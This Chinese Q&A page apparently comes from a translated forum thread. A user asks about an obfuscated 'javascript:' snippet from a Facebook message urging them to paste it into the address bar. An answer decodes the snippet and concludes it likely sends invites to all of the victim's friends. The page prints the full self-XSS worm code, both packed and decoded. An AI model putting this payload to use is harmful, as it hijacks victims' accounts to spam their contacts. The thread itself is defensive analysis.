1. 首页
  2. 问答
  3. Facebook-JScript中的地址栏安全吗?

Facebook-JScript中的地址栏安全吗?

2010-08-13 47 views
1

我在我的Facebook消息中得到了这个消息,告诉我将它粘贴到我的地址栏中,以帮助他们在某些游戏中获得某些物品。当然,我还没有这样做,但是这样做可以吗?我的朋友是否遇到过病毒,或者这确实是游戏的一部分?如果没有,这实际上是做什么的?感谢您提前提供任何帮助。Facebook-JScript中的地址栏安全吗?

//Note: Don't Try This Yourself 

javascript:(function() 

{a='app143004169062464_jop';b='app143004169062464_jode'; 

ifc='app143004169062464_ifc'; 

ifo='app143004169062464_ifo'; 

mw='app143004169062464_mwrapper';eval(function(p,a,c,k,e,r) 

{e=function(c){return(c<a?'':e(parseInt 

(c/a)))+((c=c%a)>35?String.fromChar 

Code(c+29):c.toString(36))};if(!''.replace(/^/,String)) 

{while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function() 

{return'\\w+'};c=1};while(c--)if(k[c])p=p.rep 

lace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p} 

('J e=["\\n\\g\\j\\g\\F\\g\\i\\g\\h\\A","\\j\\h\\A\\i\\f","\\o\\f\\ 

h\\q\\i\\f\\r\\f\\k\\h\\K\\A\\L\\t","\\w\\g\\t\\t\\f\\k","\\g\\k\\k\\f\\x\\M\\N\\G\\O","\\n\\l\\i\\y\\f","\\j\\y\\o\\o\\f\\ 

j\\h","\\i\\g\\H\\f\\r\\f","\\G\\u\\y\\j\\f\\q\\n\\f\\k\\h\\j","\\p\\x\\f\\l\\h\\f\\q 

\\n\\f\\k\\h","\\p\\i\\g\\p\\H","\\g\\k\\g\\h\\q\\n\\f\\k\\h","\\t\\g\\j\\z\\l\\h\\p\\w\\q\\n\\f\\k\\h","\\j\\f\\i\\f\\p\\h\\ 

v\\l\\i\\i","\\j\\o\\r\\v\\g\\k\\n\\g\\h\\f\\v\\P\\u\\x\\r","\\B\\l\\Q\\l\\R\\B\\j\\u\\ 

p\\g\\l\\i\\v\\o\\x\\l\\z\\w\\B\\g\\k\\n\\g\\h\\f\\v\\t\\g\\l\\i\\u\\o\\S\\z\\w\\z","\\j\\y\\F\\r\\g\\h\\T\\g\\l\\i\\u\\o"];d=U;d[e[2]] 

(V)[e[1]][e[0]]=e[3];d[e[2]](a)[e[4]]=d[e[2]](b) 

[e[5]];s=d[e[2]](e[6]);m=d[e[2]](e[7]);c=d[e[9]] 

(e[8]);c[e[11]](e[10],I,I);s[e[12]](c);C(D(){W[e[13]]()},E); 

C(D(){X[e[16]](e[14],e[15])},E);C(D(){m[e[12]] 

(c);d[e[2]](Y)[e[4]]=d[e[2]](Z)[e[5]]},E);',62,69,'||||||||||||||_0x95ea| 

x65|x69|x74|x6C|x73|x6E|x61||x76|x67|x63|x45|x6D||x64| 

x6F|x5F|x68|x72|x75|x70|x79|x2F|setTimeout|function|5000| 

x62|x4D|x6B|true|var|x42|x49|x48|x54|x4C|x66|x6A|x78|x2E|x44|docu 

ment|mw|fs|SocialGraph 

Manager|ifo|ifc|||||||'.split('|'),0,{}))})();

来源

2010-08-13 xKezu

回答

1

在解码它第一步:

(function() 
{ 
a='app143004169062464_jop'; 
b='app143004169062464_jode'; 
ifc='app143004169062464_ifc'; 
ifo='app143004169062464_ifo'; 
mw='app143004169062464_mwrapper'; 

var _0x95ea=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x73\x75\x67\x67\x65\x73\x74","\x6C\x69\x6B\x65\x6D\x65","\x4D\x6F\x75\x73\x65\x45\x76\x65\x6E\x74\x73","\x63\x72\x65\x61\x74\x65\x45\x76\x65\x6E\x74","\x63\x6C\x69\x63\x6B","\x69\x6E\x69\x74\x45\x76\x65\x6E\x74","\x64\x69\x73\x70\x61\x74\x63\x68\x45\x76\x65\x6E\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67"];d=document;d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];s=d[_0x95ea[2]](_0x95ea[6]);m=d[_0x95ea[2]](_0x95ea[7]);c=d[_0x95ea[9]](_0x95ea[8]);c[_0x95ea[11]](_0x95ea[10],true,true);s[_0x95ea[12]](c);setTimeout(function(){fs[_0x95ea[13]]()},5000);setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000); 
})();

第二步:

(function() 
{ 
a='app143004169062464_jop'; 
b='app143004169062464_jode'; 
ifc='app143004169062464_ifc'; 
ifo='app143004169062464_ifo'; 
mw='app143004169062464_mwrapper'; 

var _0x95ea=["visibility", "style", "getElementById", "hidden", "innerHTML", "value", "suggest", "likeme", "MouseEvents", "createEvent", "click", "initEvent", "dispatchEvent", "select_all", "sgm_invite_form", "/ajax/social_graph/invite_dialog.php", "submitDialog"]; 
d=document;d[_0x95ea[2]](mw)[_0x95ea[1]][_0x95ea[0]]=_0x95ea[3];d[_0x95ea[2]](a)[_0x95ea[4]]=d[_0x95ea[2]](b)[_0x95ea[5]];s=d[_0x95ea[2]](_0x95ea[6]);m=d[_0x95ea[2]](_0x95ea[7]);c=d[_0x95ea[9]](_0x95ea[8]);c[_0x95ea[11]](_0x95ea[10],true,true);s[_0x95ea[12]](c);setTimeout(function(){fs[_0x95ea[13]]()},5000);setTimeout(function(){SocialGraphManager[_0x95ea[16]](_0x95ea[14],_0x95ea[15])},5000);setTimeout(function(){m[_0x95ea[12]](c);d[_0x95ea[2]](ifo)[_0x95ea[4]]=d[_0x95ea[2]](ifc)[_0x95ea[5]]},5000); 
})();

的解码码:

(function() 
{ 
d=document; 
d.getElementById('app143004169062464_mwrapper').style.visibility="hidden"; 
d.getElementById('app143004169062464_jop').innerHTML=d.getElementById('app143004169062464_jode').value; 
s=d.getElementById("suggest"); 
m=d.getElementById("likeme"); 
c=d.createEvent("MouseEvents"); 
c.initEvent("click",true,true); 
s.dispatchEvent(c); 

setTimeout(function(){fs.select_all()},5000); 
setTimeout(function(){SocialGraphManager.submitDialog("sgm_invite_form","/ajax/social_graph/invite_dialog.php")},5000); 
setTimeout(function(){m.dispatchEvent(c);d.getElementById('app143004169062464_ifo').innerHTML=d.getElementById('app143004169062464_ifc').value},5000); 
})();

很难说它做了什么。我的猜测是,它发送邀请给你所有的朋友。

来源

2010-08-13 11:45:25 Codler

+0

谢谢!这是非常丰富的! – xKezu 2010-08-13 12:13:35

0

很明显没有。即使从描述你可以告诉它是一个骗人的假。

来源

2010-08-13 11:33:58

+0

嗯,我想下一个问题是,它实际上做了什么? – xKezu 2010-08-13 11:35:32

相关问题

 相关问题